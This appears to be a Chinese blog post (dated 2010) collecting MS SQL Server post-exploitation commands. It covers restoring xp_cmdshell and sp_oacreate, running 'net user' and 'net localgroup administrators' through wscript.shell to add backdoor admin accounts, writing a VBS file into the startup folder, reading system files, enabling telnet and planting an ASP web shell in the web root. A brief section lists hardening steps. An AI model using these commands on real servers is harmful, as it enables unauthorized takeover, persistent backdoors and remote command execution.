恢复sp_addextendedproc语句:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
xp_cmdshell新的恢复办法(不用去管sp_addextendedproc是不是存在)
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
1.未能找到存储过程'master..xpcmdshell'之解决方法:
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2.无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)
sp_dropextendedproc "xp_cmdshell"
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3.无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因:
127(找不到指定的程序。)
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
4.直接添加帐户法
删除odsole70.dll:
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
恢复odsole70.dll:
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
直接添加帐户命令:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe/c net localgroup administrators 用户名 /add'
5.恢复时一些常用的SQL语句:
利用sp_addextendedproc恢复大部分常用存储扩展(得先利用最顶上的语句恢复自己):
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
恢复cmdshell:exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
判断存储扩展是否存在(返回结果为1就ok):
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
恢复xp_cmdshell(返回结果为1就ok):
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.
sysobjectswhere xtype='x' and name='xp_cmdshell'
否则上传xplog7.0.dll:
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
************************以下为防范时用**********************
1.删除所有危险扩展:
Drop PROCEDURE sp_makewebtask
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_process
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistring
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
exec master..sp_dropextendedproc sp_add_job
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwrite
exec master..sp_dropextendedproc xp_readwebtask
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistring
exec master..sp_dropextendedproc sp_OACreate
Drop PROCEDURE sp_addextendedproc
2.删除xp_cmdshell扩展:sp_dropextendedproc 'xp_cmdshell'
3.修补sa弱口令:exec sp_password NULL,'新密码','sa'
四.终极方法.如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
1,查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user yszar andylau /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators yszar /add'
xp或2003server系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
或者可以
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX为你要执行的命令
有时候用查询分离器连接执行以上语句的时候会出现找不到存储过程 sp_addextendedproc
解决方法:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call
*/
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
这段代码贴入查询分离器,执行
1.突破xplog70.dll
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user 用户名 密码 /add','0','true'
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net localgroup administrators 用户名 /add','0','true'
2.恢复xp_cmdshell
先尝试恢复xp_cmdshell,sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',
结果发现xpsql70.dll被删除。
然后写vbs文件到启动组里面:
declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'set wshshell=createobject("wscript.shell")'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'a=wshshell.run ("cmd.exe /c net user lintao lintao520 /add",0)'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'b=wshshell.run ("cmd.exe /c net localgroup administrators lintao /add",0)'
3.去除SA的xp_cmdshell权限
如果你不需要扩展存储过程xp_cmdshell请把它去掉。使用这个SQL语句:
use master
sp_dropextendedproc 'xp_cmdshell'
xp_cmdshell是进入操作系统的最佳捷径,是数据库留给操作系统的一个大后门。如果你需要这个存储过程,请用这个语句也可以恢复过来。
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
4.上传xplog7.0.dll:
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
'net start telnet'他的作用是在服务器端通过wscript.shell执行net start telnet,从而开启服务器的telnet服务。你一定会想到FSO了!对,我们也可以通过它进行文件的管理,例如:declare @o int, @f int, @t int, @ret int ,@c varchar(8000)declare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'opentextfile',
@f out, 'c:\boot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line outselect @c=''while( @ret = 0) begin select @c=@c+@line+char(13)+char(10)exec @ret = sp_oamethod @f, 'readline', @line out end可以读取c:\boot.ini文件中的内容并存储在局部变量@c中。如果想读出来,只需要创建一个临时表写入就可以了。用这种方法也可以创建文件,并写入数据,例如:declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject',
@o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp',
1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run("cmd.exe /c "&request.querystring("cmd")) %>'在c:\inetpub\wwwroot\foo.asp创建了一个只有两行代码的asp木马。这种方法避免了使用备份所带来的大量无用数据和使用sp_makewebtask存储扩展所带来的创建临时表的麻烦。
2010-05-07 16:33
- 暂无评论
